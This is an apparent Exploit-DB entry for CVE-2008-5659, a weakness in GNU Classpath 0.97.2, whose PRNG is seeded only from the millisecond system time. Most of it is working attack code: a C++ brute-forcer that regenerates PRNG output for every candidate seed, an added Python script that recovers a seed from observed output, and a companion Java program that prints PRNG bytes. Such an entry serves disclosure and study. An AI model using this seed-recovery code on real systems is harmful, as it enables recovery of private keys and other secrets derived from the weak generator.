GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness 2
2008-12-05T00:00:00
ID EDB-ID:32674 Type exploitdb Reporter Jack Lloyd Modified 2008-12-05T00:00:00
Description
GNU Classpath 0.97.2 'gnu.java.security.util.PRNG' Class Entropy Weakness (2). CVE-2008-5659. Remote exploit for multiple platforms.
source: http://www.securityfocus.com/bid/32909/info
GNU Classpath is prone to a weakness that undermines any cryptography built on it: its pseudo-random number generator (PRNG), gnu.java.security.util.PRNG, is seeded from the system time in milliseconds and nothing else, so its entire output is determined by a value an attacker can guess to within a few thousand candidates.
Attackers may leverage this issue to recover sensitive information derived from the PRNG, such as private keys, which can lead to further attacks.
Classpath 0.97.2 is vulnerable; other versions may also be affected.
#include <botan/init.h>
#include <botan/sha160.h>
#include <botan/loadstor.h>
using namespace Botan;

#include <cstdio>
#include <cstdlib>
#include <ctime>

// Regenerates the first 40 bytes gnu.java.security.util.PRNG emits for every
// candidate millisecond seed in a window, using Botan's SHA-1 (Botan 1.x API).
// Usage: prng_brute [how_many_ms] [start_ms]
int main(int argc, char* argv[])
   {
   Botan::LibraryInitializer init;

   // by default start with a guess of 1 minute ago
   u64bit time_guess = (std::time(0) - 60);
   time_guess *= 1000; // convert to ms
   u32bit how_many = 60000; // 60 second range by default

   if(argc >= 2)
      how_many = std::atoi(argv[1]);
   if(argc >= 3)
      time_guess = std::strtoull(argv[2], 0, 10); // a millisecond timestamp does not fit in atoi's int

   //printf("Starting from %llu up to %u\n", (unsigned long long)time_guess, how_many);

   SHA_160 sha;

   byte buf[8], hash[40];

   for(u32bit i = 0; i != how_many; ++i)
      {
      Botan::store_be(time_guess, buf); // the seed: the ms timestamp as an 8-byte big-endian value

      // First block of output: SHA-1(seed)
      sha.update(buf, sizeof(buf));
      sha.final(hash);

      // Second block: SHA-1(seed || previous block)
      sha.update(buf, sizeof(buf));
      sha.update(hash, 20); // previous output
      sha.final(hash + 20);

      // Uncomment to dump every candidate, then grep for the 40 bytes the
      // victim printed (e.g. the output of the companion entry EDB-ID:32673).
      /*
      printf("seed=%llu hash=", (unsigned long long)time_guess);
      for(u32bit j = 0; j != sizeof(hash); ++j)
         printf("%02X", hash[j]);
      printf("\n");
      */

      ++time_guess; // move to next ms
      }
   }
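Putting the search to work end to end, as an added example that is not part of the Exploit-DB entry or Jack Lloyd's code: the Python below reproduces the output model encoded by the Botan brute-forcer above (an 8-byte big-endian millisecond seed, first block SHA-1(seed), each later block SHA-1(seed || previous block); carrying the pattern past two blocks is this example's reading of that code, not something the entry states), constructs a victim output from a chosen timestamp, and recovers the seed from a 20-byte window of that output by trying every millisecond in the last minute. The timestamp, the observation offset and all function names are this example's own.

```python
# Added example (not part of the Exploit-DB entry or Jack Lloyd's code):
# seed recovery against the Classpath PRNG output model, end to end.
# Assumed model, read off the Botan brute-forcer on this page and extended
# from two blocks to n: seed = 8-byte big-endian millisecond timestamp,
# block1 = SHA-1(seed), block_n = SHA-1(seed || block_{n-1}).
# The "victim" output below is constructed from a chosen timestamp; nothing
# here was captured from a real Classpath run.
import hashlib
import struct
import time


def classpath_prng_stream(seed_ms: int, nbytes: int) -> bytes:
    """First nbytes the PRNG emits for a given millisecond seed."""
    seed = struct.pack(">Q", seed_ms)   # same 8-byte big-endian layout as store_be()
    out, prev = b"", b""
    while len(out) < nbytes:
        prev = hashlib.sha1(seed + prev).digest()   # next 20-byte block
        out += prev
    return out[:nbytes]


def recover_seed(observed: bytes, offset: int, start_ms: int, window_ms: int):
    """Brute-force window_ms consecutive seeds from start_ms and return the one
    whose stream contains `observed` at byte `offset`, or None.

    Cost per candidate is ceil((offset + len(observed)) / 20) SHA-1 calls, so
    observing bytes deep in the stream (a nonce drawn after other data) only
    makes the search linearly slower; a one-minute window is 60,000 candidates.
    """
    need = offset + len(observed)
    for cand in range(start_ms, start_ms + window_ms):
        if classpath_prng_stream(cand, need)[offset:] == observed:
            return cand
    return None


def demo() -> dict:
    """Victim seeds the PRNG 37 s before 'now' (the attacker does not know this);
    the attacker sees only the second 20-byte block and searches the last minute."""
    now_ms = int(time.time() * 1000)
    secret_seed = now_ms - 37_000                     # constructed secret
    victim_output = classpath_prng_stream(secret_seed, 40)
    chunk, offset = victim_output[20:40], 20
    found = recover_seed(chunk, offset, now_ms - 60_000, 60_000)
    return {"secret": secret_seed, "recovered": found, "match": found == secret_seed}


if __name__ == "__main__":
    r = demo()
    print("recovered seed %s (match=%s)" % (r["recovered"], r["match"]))
```

When the observed bytes sit at offset 0 only one SHA-1 per candidate is needed, so even a day-long uncertainty window (86,400,000 seeds) is minutes of work on a single core; that, not any property of SHA-1, is why a millisecond timestamp is not a usable seed.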
Related entries

CVE-2008-5659 (NVD, published 2008-12-17, CWE-310, CVSS v2 base score 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P): The gnu.java.security.util.PRNG class in GNU Classpath 0.97.2 and earlier uses a predictable seed based on the system time, which makes it easier for context-dependent attackers to conduct brute force attacks against cryptographic routines that use this class for randomness, as demonstrated against DSA private keys. NVD's configuration lists Classpath releases from 0.6 through 0.97.2 (0.6 to 0.20, 0.90 to 0.93, 0.95 to 0.97.2) as affected. OSVDB: 53101.

EDB-ID:32673, GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness 1 (Jack Lloyd, 2008-12-05, same SecurityFocus source): the companion program. Run on a vulnerable Classpath it prints System.currentTimeMillis() and then the first 40 bytes the PRNG produces as hex. Those 40 bytes are what the brute-forcer above regenerates from each candidate seed, and the printed time shows how close the starting guess has to be.

import gnu.java.security.util.PRNG;

class PRNGTest {
   public static void main(String args[])
   {
   long t = System.currentTimeMillis();

   System.out.println("Time in ms is " + t);

   PRNG prng = PRNG.getInstance();

   byte buffer[] = new byte[40];

   prng.nextBytes(buffer, 0, buffer.length);

   for(int i = 0; i != buffer.length; ++i)
      {
      // There must be an easier way to do this (right?)
      // Java bytes are signed: map -128..-1 back to 128..255. The original
      // tested "<= 0", which turns a zero byte into the three-character "100".
      int intval = buffer[i];

      if(intval < 0)
         intval += 256;

      String s = Integer.toHexString(intval);

      if(s.length() == 1)
         s = "0" + s;

      System.out.print(s);
      }
   System.out.println("");
   }
}